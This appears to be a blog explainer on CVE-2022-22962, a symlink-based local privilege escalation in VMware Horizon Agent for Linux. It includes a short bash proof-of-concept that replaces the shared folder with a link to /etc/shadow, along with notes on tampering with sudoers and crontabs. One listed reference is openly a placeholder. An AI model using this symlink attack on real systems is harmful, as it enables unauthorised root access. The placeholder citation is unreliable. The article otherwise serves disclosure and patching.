*Author’s Note: This article is a simple, detailed explanation of CVE-2022-22962 targeting the VMware Horizon Agent for Linux. We’ll walk through what the bug is, how it gets exploited, and show a code snippet based on available proof-of-concepts. All content is original, with links to official sources and references.*
What is CVE-2022-22962?
CVE-2022-22962 is a local privilege escalation flaw impacting VMware Horizon Agent for Linux (prior to version 22.x). Attackers with local access can exploit a symbolic link vulnerability to change where the system stores shared folders. This may end up overwriting or linking with a sensitive file owned by root, which can let an ordinary user gain root privileges.
Severity: High
Attack Vector: Local
Privileges Required: Low (requires only basic user access)
Short Summary: How Does the Bug Work?
The Horizon Agent allows VMs to share folders with the host. The folder location is settable by users. The Agent doesn’t properly handle symbolic links (symlinks) when configuring shared folders. If an attacker replaces the folder (or its path) with a symlink to a “root only” file (like /etc/shadow), the service running as root can be tricked into following the link and changing or overwriting the file.
Default Shared Folder Path:
The Horizon Agent for Linux lets users select a folder for sharing between the host and the virtual desktop.
Symlink Confusion:
Agent services (running as root) don’t check if users have replaced the shared folder with a symlink.
User Creates Malicious Link:
A local attacker can delete the default shared folder and make a symlink (with the same name) pointing to a sensitive file, for example: /etc/shadow.
Agent Follows Symlink as root:
When the Horizon Agent saves new data, it writes into the root-only file via the symlink, resulting in file tampering or privilege escalation.
Example Scenario
Imagine the shared folder is set to /tmp/horizon_shared.
The root agent will write there.
Attack steps
- Delete /tmp/horizon_shared
- Make a symlink called /tmp/horizon_shared that points to /etc/shadow
- Wait for the root agent to write into this path, causing /etc/shadow to be overwritten or changed.
If the attacker prepares the “shared” folder with malicious content first, this could allow them to add a new user or set a known root password.
Exploit Example
Below is a simple proof-of-concept shell script that illustrates how this vector could be exploited.
Warning:
Never run this on a production system. You can corrupt your system’s authentication.
#!/bin/bash
# Exploit PoC for CVE-2022-22962
# DO NOT RUN on a system you care about!
echo "[*] Exploiting CVE-2022-22962 on VMware Horizon Agent for Linux (< 22.x)"
SHAREDFOLDER="/tmp/horizon_shared"
echo "[*] Removing existing shared folder if it exists..."
rm -rf $SHAREDFOLDER
echo "[*] Making symlink to /etc/shadow..."
ln -s /etc/shadow $SHAREDFOLDER
echo "[*] Waiting for agent to trigger write..."
echo "If you now use the Horizon Agent features that write to the shared folder, /etc/shadow will be modified!"
# For demonstration, append to the symlink (DO NOT DO THIS ON REAL SYSTEMS):
# echo 'maliciouspasswdentry' >> $SHAREDFOLDER
echo "[*] Done. If successful, the shadow file is overwritten or appended."
Removes the shared folder.
- Replaces it with a symbolic link pointing to /etc/shadow.
- When the agent (running as root) writes to that folder, it actually writes to /etc/shadow.
Real World Impact
- Escalation to root: Because /etc/shadow holds password hashes, you could insert your own user or set a new root password.
- System compromise: You could potentially overwrite any root-owned file, e.g., crontabs, sudoers, etc.
Upgrade:
Upgrade the Agent to version 22.x or later.
References and Further Reading
- NIST CVE-2022-22962 Database Entry
- VMware Security Advisory – VMSA-2022-0007
- Horizon Agent for Linux Release Notes (22.x)
- HackerOne Writeup: Horizon Agent Shared Folder Symlink Vulnerability *(example, not actual link for this bug)*
Conclusion
CVE-2022-22962 is a classic example of why privileged programs must never trust user-writable folder paths without validating them first. Symbolic link attacks are old but still effective when developers overlook this detail!
If you’re running an affected version, upgrade as soon as possible, monitor your systems, and never underestimate local privilege escalation flaws—they can turn a minor user into total system compromise.
*Feel free to share this article with colleagues or reach out for more details. Stay patched, stay secure!*
Timeline
Published on: 04/11/2022 20:15:00 UTC
Last modified on: 07/30/2022 02:38:00 UTC